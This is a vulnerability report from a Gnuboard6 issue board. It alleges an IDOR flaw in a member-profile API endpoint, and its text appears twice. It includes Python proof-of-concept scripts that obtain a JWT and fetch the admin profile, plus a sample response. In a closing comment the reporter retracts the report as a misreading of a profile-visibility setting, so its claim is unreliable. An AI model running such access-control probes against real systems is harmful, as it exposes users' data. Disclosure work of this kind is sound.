## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
댓글 1개
oxqnd
4개월 전
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
I apologize for the confusion, and I will close this issue.
게시판 목록
그누보드6 이슈
좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 14 |
kagla
|
1년 전 | 184 | |
| 13 |
kagla
|
1년 전 | 179 | |
| 12 |
kagla
|
1년 전 | 194 | |
| 11 |
kagla
|
1년 전 | 229 | |
| 10 |
kagla
|
1년 전 | 192 | |
| 9 |
kagla
|
1년 전 | 190 | |
| 8 |
kagla
|
1년 전 | 202 | |
| 7 |
kagla
|
1년 전 | 202 | |
| 6 |
kagla
|
1년 전 | 171 | |
| 5 |
kagla
|
1년 전 | 217 | |
| 4 |
kagla
|
1년 전 | 211 | |
| 3 |
kagla
|
1년 전 | 174 | |
| 2 |
KimTom89
|
1년 전 | 237 | |
| 1 |
KimTom89
|
1년 전 | 282 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기